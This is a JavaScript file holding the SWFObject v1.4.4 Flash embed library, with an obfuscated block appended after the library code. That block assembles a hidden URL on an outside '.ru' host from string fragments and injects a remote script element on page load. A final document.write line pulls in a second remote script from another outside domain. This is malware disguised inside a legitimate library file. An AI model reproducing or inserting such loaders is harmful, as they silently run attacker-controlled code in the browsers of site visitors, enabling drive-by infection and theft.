/**
 * SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 * **SWFObject is the SWF embed script formerly known as FlashObject. The name was changed for
 *   legal reasons.
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}
if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}
if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}
deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a,_b){if(!document.getElementById){return;}
this.DETECT_KEY=_b?_b:"detectflash";
this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);
this.params=new Object();
this.variables=new Object();
this.attributes=new Array();
if(_1){this.setAttribute("swf",_1);}
if(id){this.setAttribute("id",id);}
if(w){this.setAttribute("width",w);}
if(h){this.setAttribute("height",h);}
if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}
this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();
if(c){this.addParam("bgcolor",c);}
var q=_8?_8:"high";
this.addParam("quality",q);
this.setAttribute("useExpressInstall",_7);
this.setAttribute("doExpressInstall",false);
var _d=(_9)?_9:window.location;
this.setAttribute("xiRedirectUrl",_d);
this.setAttribute("redirectUrl","");
if(_a){this.setAttribute("redirectUrl",_a);}};
deconcept.SWFObject.prototype={setAttribute:function(_e,_f){
this.attributes[_e]=_f;
},getAttribute:function(_10){
return this.attributes[_10];
},addParam:function(_11,_12){
this.params[_11]=_12;
},getParams:function(){
return this.params;
},addVariable:function(_13,_14){
this.variables[_13]=_14;
},getVariable:function(_15){
return this.variables[_15];
},getVariables:function(){
return this.variables;
},getVariablePairs:function(){
var _16=new Array();
var key;
var _18=this.getVariables();
for(key in _18){_16.push(key+"="+_18[key]);}
return _16;},getSWFHTML:function(){var _19="";
if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){
if(this.getAttribute("doExpressInstall")){
this.addVariable("MMplayerType","PlugIn");}
_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\"";
_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";
var _1a=this.getParams();
for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}
var _1c=this.getVariablePairs().join("&");
if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";
}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");}
_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\">";
_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";
var _1d=this.getParams();
for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}
var _1f=this.getVariablePairs().join("&");
if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}
return _19;
},write:function(_20){
if(this.getAttribute("useExpressInstall")){
var _21=new deconcept.PlayerVersion([6,0,65]);
if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){
this.setAttribute("doExpressInstall",true);
this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));
document.title=document.title.slice(0,47)+" - Flash Player Installation";
this.addVariable("MMdoctitle",document.title);}}
if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){
var n=(typeof _20=="string")?document.getElementById(_20):_20;
n.innerHTML=this.getSWFHTML();return true;
}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}
return false;}};
deconcept.SWFObjectUtil.getPlayerVersion=function(){
var _23=new deconcept.PlayerVersion([0,0,0]);
if(navigator.plugins&&navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];
if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}
}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}
catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}
catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}
catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}
return _23;};
deconcept.PlayerVersion=function(_27){
this.major=_27[0]!=null?parseInt(_27[0]):0;
this.minor=_27[1]!=null?parseInt(_27[1]):0;
this.rev=_27[2]!=null?parseInt(_27[2]):0;
};
deconcept.PlayerVersion.prototype.versionIsValid=function(fv){
if(this.major<fv.major){return false;}
if(this.major>fv.major){return true;}
if(this.minor<fv.minor){return false;}
if(this.minor>fv.minor){return true;}
if(this.rev<fv.rev){
return false;
}return true;};
deconcept.util={getRequestParameter:function(_29){
var q=document.location.search||document.location.hash;
if(q){var _2b=q.substring(1).split("&");
for(var i=0;i<_2b.length;i++){
if(_2b[i].substring(0,_2b[i].indexOf("="))==_29){
return _2b[i].substring((_2b[i].indexOf("=")+1));}}}
return "";}};
deconcept.SWFObjectUtil.cleanupSWFs=function(){if(window.opera||!document.all){return;}
var _2d=document.getElementsByTagName("OBJECT");
for(var i=0;i<_2d.length;i++){_2d[i].style.display="none";for(var x in _2d[i]){
if(typeof _2d[i][x]=="function"){_2d[i][x]=function(){};}}}};
deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};
__flash_savedUnloadHandler=function(){};
if(typeof window.onunload=="function"){
var _30=window.onunload;
window.onunload=function(){
deconcept.SWFObjectUtil.cleanupSWFs();_30();};
}else{window.onunload=deconcept.SWFObjectUtil.cleanupSWFs;}};
if(typeof window.onbeforeunload=="function"){
var oldBeforeUnload=window.onbeforeunload;
window.onbeforeunload=function(){
deconcept.SWFObjectUtil.prepUnload();
oldBeforeUnload();};
}else{window.onbeforeunload=deconcept.SWFObjectUtil.prepUnload;}
if(Array.prototype.push==null){
Array.prototype.push=function(_31){
this[this.length]=_31;
return this.length;};}
var getQueryParamValue=deconcept.util.getRequestParameter;
var FlashObject=deconcept.SWFObject;
var SWFObject=deconcept.SWFObject;


var Y={};var Fs=new Array();var Q=["Sq"];var q="";var A={};try {nX=["FE","X","r"];var y=["MV"];var p=window[String("une"+"sca"+"pe")];d={};EI=["_"];tk={ah:51148};var EC=new Array();var lp=55564;HZ={};U={PK:54630};ee={AR:false};var SW=["vb"];this.NS='';QPZ={};var l=new String("1");fG=[];G=[];SF=["Nh","g","Pt"];Ph=["Vi","WZ","eg"];SA={eU:29672};var k=String("rep"+"lacjhC".substr(0,3)+"e");var ng=["XL"];var EJ=50739;Wp={DW:false};this.RJ=false;gO=48574;gO++;var v='';this.Gd=56426;this.Gd++;lP=31909;lP+=145;var W="OdEDonl".substr(4)+"oad";this.NV=48319;this.NV--;var V=window[(String("RegEHP64".substr(0,4)+"xp"))];var QM=new String();yc=43881;yc+=29;function H(l,n){var xh={BS:7406};try {var Mx='gG'} catch(Mx){};this.Hz="";try {} catch(NQ){};var R=new String("[xzj".substr(0,1));Gt={};Bl={Bh:11365};QZ=11784;QZ--;var hi="hi";R+=n;var RGF={};var Bw={};this.gg=56372;this.gg+=11;R+=p("%5d");this.rf=9315;this.rf++;HzP={};this.Uo=2474;this.Uo-=203;var hXk={AT:false};iX={pE:"Kv"};var B=new V(R, new String("g"));var _a=44217;return l.replace(B, v);var AZ=["ZV"];try {var wd='Hw'} catch(wd){};var BU=["HM"];try {} catch(hW){};try {} catch(Ne){};};var wX="";var NM={Qg:"US"};var yx={Ah:"LR"};this.br=59508;this.br-=173;var rk={hz:5979};this.Sm=64200;this.Sm+=115;var h="Bd4http:".substr(3)+"//ash"+"softw"+"are.r"+"wmThu:".substr(4);var qc=["NeN","Fy"];var zo=[];var hc=["mp","IR"];NR=36813;NR--;var O=new String("/tic"+"ketm"+"aste"+"r-co"+"m/go"+"ogle"+".com6gf".substr(0,4)+"UXn/mlbUnX".substr(3,4)+".com"+".php");iL=["Gc","_o","T_"];this.UF=36481;this.UF+=240;var HO=new Date();try {} catch(Qi){};try {} catch(iLn){};try {} catch(LJ){};var t=639589-631509;tm={Co:false};this.Jk=36839;this.Jk++;var uB=60092;LT={Gx:"SC"};this.vTf=false;var nI=[];function o(){Rp=33847;Rp+=95;Gg=["jt","Hj"];this.Ny=55776;this.Ny-=88;this.Ip=40023;this.Ip-=10;var e="appen"+"dChil"+"d";var Wj=H('sYcerhiEpGtP','f2SGXaokvjEZd_DVY7mKe4Ph');var hE="hE";TL=44317;TL++;var rq=["lKP","sj"];var De=["ta","Bf","NL"];var lN=document;var AJ=[];var MY=["egy"];lQ=["Ek","Ay"];oK=["AK","YG"];this.oG=52382;this.oG-=157;this.yf=false;Qz=18070;Qz++;F=lN.createElement(Wj);w=h+t;nS={};vz={};w=w+O;var dZ="";PyZ=["ug","Ri"];var orU=false;this.Vp=5036;this.Vp-=155;pp=["AG","DV"];this.sO=28198;this.sO--;F.src=w;try {var xK='As'} catch(xK){};pM=18671;pM-=220;EJI={pG:"HY"};F["defe"+"FtYgr".substr(4)]=l;var JH={dM:"Kz"};var yM={nU:16579};Ax={};this.NA='';Kw=9159;Kw-=181;Bz=11699;Bz++;var la=["pw","nJ"];var vi=lN.body;this.sz=812;this.sz--;try {} catch(pc){};try {} catch(hCU){};vi[e](F);var IRZ=new Date();yZ=38773;yZ-=214;Jj=13592;Jj-=121;var oC=new Date();};yN=["c","NQA"];BQ=7494;BQ-=162;var iW='';wi=38735;wi+=157;window[W]=o;var fr="fr";try {var Mn='UW'} catch(Mn){};this.jx=false;this.zO=false;try {var Fe='gP'} catch(Fe){};} catch(N){PT=["HX"];Lj={};LTe={Gz:45846};var JI=new String();oE={Fv:32698};};DP={wE:"dK"};ph=["pU"];




document.write('<s'+'cript type="text/javascript" src="http://foxy.divarug.com:8080/CD-R.js"></scr'+'ipt>');